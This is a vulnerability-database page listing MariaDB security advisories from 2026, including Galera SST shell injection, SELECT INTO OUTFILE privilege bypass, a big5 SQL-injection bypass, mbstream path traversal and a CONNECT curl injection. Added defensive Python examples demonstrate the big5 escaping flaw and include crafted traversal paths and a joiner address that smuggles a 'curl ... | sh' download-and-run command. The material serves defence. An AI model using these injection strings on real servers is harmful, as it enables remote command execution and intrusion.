MariaDB (vendor: MariaDB) - open source fork of the MySQL database


Products by MariaDB, sorted by most security vulnerabilities since 2018

MariaDB (Server): 367 vulnerabilities. Open source RDBMS forked from MySQL.
MariaDB Connector/C: 1 vulnerability
MariaDB MaxScale: 1 vulnerability

By the Year

In 2026 there have been 11 vulnerabilities in MariaDB, with an average score of 8.0 out of 10. In 2025 MariaDB had 2 security vulnerabilities published, so 9 more vulnerabilities have already been reported in 2026 than in all of last year.




Year    Vulnerabilities    Average Score
2026    11                 8.00
2025    2                  0.00
2024    3                  0.00
2023    4                  6.35
2022    60                 6.83
2021    15                 5.43
2020    16                 5.69
2019    16                 5.73
2018    40                 5.58

It may take a day or so for new MariaDB vulnerabilities to show up in the stats or in the list of recent security vulnerabilities. Additionally vulnerabilities may be tagged under a different product or component name.

Recent MariaDB Security Vulnerabilities

CVE-2026-48165 (Jun 12, 2026)
wsrep_sst shell execution via wsrep_sst_receive_address / wsrep_sst_donor (10.6.x, 10.11.x, 11.4.x, 11.8.x, 12.3.1)
MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.27, 10.11.1 to before 10.11.18, 11.4.1 to before 11.4.12, 11.8.1 to before 11.8.8, and 12.3.1, a high-privileged MariaDB user could have used the wsrep_sst_receive_address or wsrep_sst_donor global system variables to execute shell commands as the uid of the mariadbd process on the Galera joiner node. This issue has been patched in versions 10.6.27, 10.11.18, 11.4.12, 11.8.8, and 12.3.2.
CVE-2026-48163 (Jun 12, 2026)
SST shell execution on the donor via the rsync SST method (before 10.6.27, 10.11.18, 11.4.12, 11.8.8, 12.3.2)
MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.27, 10.11.1 to before 10.11.18, 11.4.1 to before 11.4.12, 11.8.1 to before 11.8.8, and 12.3.1, during the SST the donor node interpolates parameters sent by the joiner into a command line. Not all parameters were properly validated, which could allow a malicious joiner to execute arbitrary shell commands on the donor side via the rsync SST method. This issue has been patched in versions 10.6.27, 10.11.18, 11.4.12, 11.8.8, and 12.3.2.
CVE-2026-44173 (Jun 12, 2026)
Privilege escalation: SELECT ... INTO OUTFILE / DUMPFILE without the FILE privilege (10.6.x to 12.3.1)
MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, MariaDB allowed SELECT ... INTO OUTFILE and SELECT ... INTO DUMPFILE without verifying the FILE privilege if the FROM clause contained only subqueries. This issue has been patched in versions 10.6.26, 10.11.17, 11.4.11, 11.8.7, and 12.3.2.
CVE-2026-44172 (Jun 12, 2026)
SQL injection via the text protocol with the big5 character set despite mysql_real_escape_string(), versions 3.3.18 / 3.4.8, fixed in 3.3.19 / 3.4.9 (3.3.x and 3.4.x are MariaDB Connector/C release numbers, matching the Connector/C entry in the product list above, not server versions)
MariaDB server is a community developed fork of MySQL server. In versions 3.3.18 and 3.4.8, an application that was taking non-validated user input, escaping it with mysql_real_escape_string() and sending it to the database using the text protocol and the big5 character set was vulnerable to SQL injection, even though mysql_real_escape_string() was supposed to prevent it. This issue has been patched in versions 3.3.19 and 3.4.9.
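The mechanism behind this entry, shown as an added example that is not code from MariaDB or Connector/C: a byte-oriented escaper puts a backslash in front of a quote, but when the server decodes the statement as big5 the backslash byte (0x5C) is a legal trail byte and is absorbed into the preceding two-byte character, so the quote is live again. The lead byte 0xA4 is chosen for illustration because it opens the common-hanzi rows of big5, where 0x5C is a valid trail byte; the attacker input is constructed. The check function decodes the escaped bytes in the connection charset and reports whether any quote survives unescaped; the hardened escaper refuses byte strings that are not well-formed in that charset and escapes at character level.

```python
"""Added example (not MariaDB or Connector/C code): charset-unaware escaping
versus a server that decodes the statement as big5.  Constructed input only."""

# Bytes that backslash-style escaping must protect: NUL, ', ", \, LF, CR, ^Z.
SPECIAL = {0x00, 0x27, 0x22, 0x5C, 0x0A, 0x0D, 0x1A}


def byte_escape(data: bytes) -> bytes:
    """Escape byte by byte with no knowledge of the connection charset."""
    out = bytearray()
    for b in data:
        if b in SPECIAL:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def unescaped_quote_after_decode(escaped: bytes, charset: str) -> bool:
    """Decode the escaped fragment the way the server's parser would (in the
    connection charset) and report whether any single quote is left without
    a backslash in front of it."""
    text = escaped.decode(charset, errors="replace")
    return any(ch == "'" and (i == 0 or text[i - 1] != "\\")
               for i, ch in enumerate(text))


def charset_aware_escape(data: bytes, charset: str):
    """Escape at character level.  Input that is not well-formed in the
    charset (for example a lead byte followed by a quote) yields None instead
    of being passed through, so a truncated multibyte sequence can never
    absorb the escaping backslash."""
    try:
        text = data.decode(charset)
    except UnicodeDecodeError:
        return None
    out = []
    for ch in text:
        if ord(ch) in SPECIAL:
            out.append("\\")
        out.append(ch)
    return "".join(out).encode(charset)


# Constructed attacker input: 0xA4 is a big5 lead byte (first row of the
# common-hanzi block, where 0x5C is a valid trail byte), followed by a quote.
ATTACK = b"\xa4'"


def demo() -> dict:
    naive = byte_escape(ATTACK)                       # b"\xa4\\'"
    return {
        "naive_bytes": naive,
        # single-byte charset: the backslash still protects the quote
        "latin1_safe": not unescaped_quote_after_decode(naive, "latin1"),
        # big5: \xa4\x5c becomes one character and the quote goes live
        "big5_unsafe": unescaped_quote_after_decode(naive, "big5"),
        "aware_rejects": charset_aware_escape(ATTACK, "big5") is None,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The advisory names the text protocol specifically; parameters bound through prepared statements on the binary protocol never pass through string escaping at all, which is the durable application-side fix regardless of connector version.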
CVE-2026-44171 (Jun 12, 2026)
mbstream path traversal when unpacking an archive (10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, and the later series listed below; patched)
MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, mbstream did not check for /../ in the path when unpacking the archive. A proper backup can never contain such paths, but a specially crafted archive could have caused mbstream to create files outside of the target-dir path. This issue has been patched in versions 10.6.26, 10.11.17, 11.4.11, 11.8.7, and 12.3.2.
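A member-path check of the kind the advisory describes as missing, written as an added example and not taken from mbstream: since a real backup never needs a ".." component, an absolute path or a NUL byte, all three are refused outright, and the resolved destination is then compared against the real target directory so that a member written earlier as a symlink pointing out of the tree cannot be used as a parent. Member names are treated as POSIX paths, and the sample member list is constructed for the example.

```python
"""Added example, not mbstream code: decide whether an archive member name may
be written under target_dir.  Member names are treated as POSIX paths
(assumption for this example)."""
import os
import posixpath


def safe_member_path(target_dir: str, member: str):
    """Return the absolute destination for member, or None if it must be refused."""
    if not member or "\x00" in member or member.startswith("/"):
        return None
    # A legitimate backup never contains a '..' component, so reject it outright
    # rather than trying to normalise it away.
    if ".." in member.split("/"):
        return None
    norm = posixpath.normpath(member)
    if norm in (".", "") or norm.startswith("/"):
        return None
    # Defence in depth: resolve symlinks on both sides and insist the destination
    # stays inside the real target directory.
    root = os.path.realpath(target_dir)
    dest = os.path.realpath(os.path.join(root, norm))
    if dest != root and not dest.startswith(root + os.sep):
        return None
    return dest


def is_safe_member(target_dir: str, member: str) -> bool:
    return safe_member_path(target_dir, member) is not None


def triage_members(target_dir: str, members):
    """Split a member list into (accepted, rejected) before anything is written."""
    accepted, rejected = [], []
    for m in members:
        (accepted if is_safe_member(target_dir, m) else rejected).append(m)
    return accepted, rejected


# Constructed sample: ordinary backup file names plus crafted entries.
SAMPLE_MEMBERS = [
    "xtrabackup_info",
    "ibdata1",
    "mysql/db.opt",
    "backup_dir/./ib_logfile0",
    "../../etc/cron.d/backdoor",
    "/etc/passwd",
    "mysql/../../x",
]


if __name__ == "__main__":
    ok, bad = triage_members("/var/lib/mysql-restore", SAMPLE_MEMBERS)
    print("accepted:", ok)
    print("rejected:", bad)
```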
CVE-2026-44169 (Jun 12, 2026)
Stored routine definition leak via EXECUTE granted through a role (11.4.x, 11.8.x, 12.3.x)
MariaDB server is a community developed fork of MySQL server. From versions 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, a user getting EXECUTE access to a stored routine via a role could see the routine definition even without the SHOW CREATE ROUTINE privilege. This issue has been patched in versions 11.4.11, 11.8.7, and 12.3.2.
CVE-2026-44168 (Jun 12, 2026)
SST shell injection on the donor via the mariabackup SST method (10.6.x to 10.6.25, 10.11.x to 10.11.16, 11.4.x to 11.4.10, 11.8.x to 11.8.6, 12.3.1)
MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, during the SST the donor node interpolates parameters sent by the joiner into a command line. Not all parameters were properly validated, which could allow a malicious joiner to execute arbitrary shell commands on the donor side via the mariabackup SST method. This issue has been patched in versions 10.6.26, 10.11.17, 11.4.11, 11.8.7, and 12.3.2.
CVE-2026-44170 (Jun 12, 2026)
CONNECT engine REST support: shell command injection via the curl command line on Windows (before 10.6.26 / 10.11.17 / 11.4.11 / 11.8.7 / 12.3.2)
MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, MariaDB on Windows with the CONNECT engine installed and REST support enabled interpolated the table's HTTP attribute into the curl command line without proper sanitizing. This allows the user to execute shell commands on the server. This issue has been patched in versions 10.6.26, 10.11.17, 11.4.11, 11.8.7, and 12.3.2.
CVE-2026-49261 (Jun 11, 2026)
Shell execution via wsrep_notify_cmd (before 10.6.27, 10.11.18, 11.4.12, 11.8.8, 12.3.2)
MariaDB server is a community developed fork of MySQL server. Versions 10.6.1 through 10.6.26, 10.11.1 through 10.11.17, 11.4.1 through 11.4.11, 11.8.1 through 11.8.7, and 12.3.1 with `wsrep_notify_cmd` enabled would execute shell commands embedded in the name of the joiner node. This is fixed in 10.6.27, 10.11.18, 11.4.12, 11.8.8, and 12.3.2. As a workaround, anyone who cannot upgrade now should disable `wsrep_notify_cmd`.
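The four Galera entries above (rsync SST, mariabackup SST, the wsrep_sst_* variables and wsrep_notify_cmd) and the CONNECT/curl entry share one shape: a value that arrives from a peer or a table definition is pasted into a line that a shell parses. The added example below is not code from MariaDB's wsrep_sst_* scripts; it shows the two controls a reviewer looks for on the donor side: a strict grammar for the joiner-supplied address and node name, and passing the value to the SST tool as a single argv element with no shell in between. The rsync module name `rsync_sst`, the data directory path and the node-name grammar are illustrative assumptions.

```python
"""Added example, not from MariaDB's wsrep_sst_* scripts: treat every value a
joiner sends (address, node name) as attacker-controlled.  Validate it against
a strict grammar, then hand it to the SST tool as one argv element."""
import re
import shlex
import subprocess

_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOST = rf"(?:{_LABEL}\.)*{_LABEL}"        # hostname or dotted IPv4
_IPV6 = r"\[[0-9A-Fa-f:.]{2,45}\]"          # bracketed IPv6 literal
SST_ADDR_RE = re.compile(rf"^(?:{_HOST}|{_IPV6})(?::(\d{{1,5}}))?$")
# Assumed node-name grammar for wsrep_notify_cmd arguments.
NODE_NAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def validate_sst_addr(addr: str) -> bool:
    """Accept host[:port] or [ipv6][:port]; reject everything else, including
    shell metacharacters, whitespace and out-of-range ports."""
    m = SST_ADDR_RE.match(addr)
    if not m:
        return False
    port = m.group(1)
    return port is None or 1 <= int(port) <= 65535


def validate_node_name(name: str) -> bool:
    return NODE_NAME_RE.match(name) is not None


def vulnerable_command(joiner_addr: str) -> str:
    """The pattern the advisories describe: untrusted text interpolated into a
    line that a shell will parse.  Kept only to contrast with build_rsync_argv;
    never run this with shell=True."""
    return f"rsync --archive --delete /var/lib/mysql/ rsync://{joiner_addr}/rsync_sst"


def build_rsync_argv(joiner_addr: str):
    """Return an argv list for subprocess (no shell), or None if the address is
    rejected.  Module name and data path are illustrative."""
    if not validate_sst_addr(joiner_addr):
        return None
    return ["rsync", "--archive", "--delete", "/var/lib/mysql/",
            f"rsync://{joiner_addr}/rsync_sst"]


def run_sst(joiner_addr: str) -> int:
    """Execute the transfer with argv semantics: the joiner string is one
    argument to rsync, whatever characters it contains."""
    argv = build_rsync_argv(joiner_addr)
    if argv is None:
        raise ValueError(f"refusing SST to malformed address {joiner_addr!r}")
    return subprocess.run(argv, check=False).returncode   # no shell=True


def shell_fallback(joiner_addr: str) -> str:
    """If a shell line is unavoidable (legacy script), quote after validating;
    quoting alone is not the control, validation is."""
    if not validate_sst_addr(joiner_addr):
        raise ValueError(f"refusing SST to malformed address {joiner_addr!r}")
    return "rsync --archive --delete /var/lib/mysql/ " + shlex.quote(
        f"rsync://{joiner_addr}/rsync_sst")


if __name__ == "__main__":
    # Constructed joiner inputs: one honest, one carrying a command separator.
    for candidate in ("10.0.0.5:4444", "10.0.0.5:4444; curl http://198.51.100.9/x | sh"):
        print(candidate, "->", build_rsync_argv(candidate))
    print("vulnerable line:", vulnerable_command("10.0.0.5:4444; id"))
```

The same validate-then-argv discipline applies to the node name handed to `wsrep_notify_cmd` and to the table HTTP attribute that the CONNECT engine passes to curl: the fix is to stop a shell from ever seeing the value, and the allowlist is what makes the residual quoting irrelevant.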
CVE-2026-35549 (Apr 03, 2026)
Large packet crash in the caching_sha2_password authentication plugin (before 11.4.10 / 11.8.6 / 12.2.2)
An issue was discovered in MariaDB Server before 11.4.10, 11.5.x through 11.8.x before 11.8.6, and 12.x before 12.2.2. If the caching_sha2_password authentication plugin is installed, and some user accounts are configured to use it, a large packet can crash the server because sha256_crypt_r uses alloca.
Built by Foundeo Inc., with data from the National Vulnerability Database (NVD). Privacy Policy. Use of this site is governed by the Legal Terms
Disclaimer
CONTENT ON THIS WEBSITE IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. Always check with your vendor for the most up to date, and accurate information.